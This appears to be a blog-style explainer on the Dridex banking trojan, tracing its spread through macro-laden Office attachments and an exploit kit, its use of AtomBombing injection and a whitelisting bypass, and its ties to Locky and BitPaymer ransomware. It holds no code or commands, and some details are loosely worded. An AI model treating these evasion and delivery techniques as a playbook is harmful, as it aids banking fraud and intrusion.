Dridex Trojan

Dridex also is known as Bugat and Cridex is a form of malware that specializes in stealing bank credentials via a system that utilizes macros from Microsoft World.

The targets of this malware are Windows users who open an email attachment in Word or Excel, causing macros to activate and download Dridex, infecting the computer and opening the victim to banking theft.

The primary objective of this software is to steal banking information from users of infected machines to immediately launch fraudulent transactions. Bank information for the software installs a keyboard listener and performs injection attacks.

First spotted in 2014, the malware’s developers appear to be very active and are constantly evolving the software’s capabilities and attack vectors.

In January last year, researchers from Forcepoint Security Labs found that Dridex had expanded its infection chain by not only targeting users through phishing campaigns but also compromised FTP websites.

The latest strain of the malware was first detected by cybersecurity researcher Brad Duncan. According to Duncan, the new Trojan variant makes use of an Application Whitelisting technique to block elements of the Windows Script Host.

By exploiting what can be considered weak execution protection and policies in the Windows WMI command-line (WMIC) utility, the malware can employ XLS scripts to bypass mitigation efforts.

Dridex has also ramped up its library infrastructure. The security researcher says the Dridex DLL files are 64-bit DLLs — with associated SHA256 hashes — which use file names that are loaded by legitimate Windows executables. However, the file names and hashes are refreshed and changed every time a victim logs into an infected Windows host.

Cybersecurity firm eSentire said that the core functionality of Dridex has received an additional upgrade and provided additional details relating to the new strain.

Dridex is an evolution of the Cridex malware, which itself is based on the ZeuS Trojan Horse malware. According to security firm Trustwave, the Dridex banking malware initially spread in late 2014 via a spam campaign that generated upwards of 15,000 emails each day. The attacks primarily focused on systems located in the United Kingdom.

In October 2015, the United States Department of Homeland Security (DHS), in collaboration with the Federal Bureau of Investigation (FBI) and the Department of Justice (DOJ) released a Technical Alert about the Dridex trojan.

According to the alert, Dridex is capable of stealing user credentials, keystroke logging, and web injects. This trojan has been used in various campaigns that launch distributed denial-of-service (DDoS) attacks and harvest users’ banking credentials.

According to a technical report published by Symantec, Dridex trojan is capable of targeting 300 different organizations in over 40 regions.

Dridex version v.3.161

Dridex version v.3.161 was first spotted on January 06, 2016. This new version was then used in redirection attack campaigns targeting the United Kingdom. The spam campaign included a Microsoft Office file attachment disguised as an invoice. Upon opening the attachment Dridex trojan gets downloaded on the compromised computer.

Dridex distributes Locky ransomware

In March 2016, researchers observed Dridex trojan distributing the Locky Ransomware via JavaScript attachments. Once dropped, Locky ransomware encrypts all the files and leaves a ransom note behind.

Dridex targets US banks

Researchers noted that the Dridex trojan has shifted its focus from targeting European users. This trojan has been evolved to target US banks. Its targets include U.S. bank accounts, users of social media sites, credit card companies, and financial investment corporations.

AtomBombing technique

Researchers spotted a new version of Dridex banking trojan, Dridex version 4. This new version uses a new injection method based on the “AtomBombing” technique, to evade antimalware solutions. This version was observed in malware campaigns against UK banks.

Connections with BitPaymer ransomware

Researchers spotted code similarities between Dridex Trojan and BitPaymer ransomware. They analyzed the samples of FriedEx also known as BitPaymer and found out that BitPaymer uses the same techniques as Dridex to hide as much information as possible about its behavior.

Whitelisting bypass technique

Security researchers identified a new variant of the Dridex trojan that uses an application Whitelisting bypass technique to avoid mitigation done through Windows Script Host. This variant was distributed via mail spam campaign containing malicious Word documents.

Dridex distributed via Spelevo exploit kit

In June 2019, researchers observed a cyberespionage campaign that distributed a newly discovered exploit kit named Spelevo. Once installed, the exploit kit first attempts to exploit the CVE-2018-15982 vulnerability in Adobe Flash Player and then looks out for Internet Explorer with use-after-free (CVE-2018-8174) vulnerability. This Spelevo exploit kit was used by attackers to deliver two banking trojans – IcedID and Dridex.

Malspam campaign delivers Dridex Trojan and RMS RAT

In July 2019, researchers observed a new mail spam campaign that delivers Dridex banking trojan and RMS RAT via malicious Microsoft Word document attachments. The phishing emails include malicious ZIP archives containing XLS (Microsoft Excel) documents disguised as fake eFax messages. The malicious documents are embedded with a macro which is designed to download and launch the Dridex Trojan and RMS RAT. Upon execution, the Dridex trojan collects credentials from the web browsers and the RMS RAT manages the infected systems




Leave a Comment

Your email address will not be published. Required fields are marked *

4 × 4 =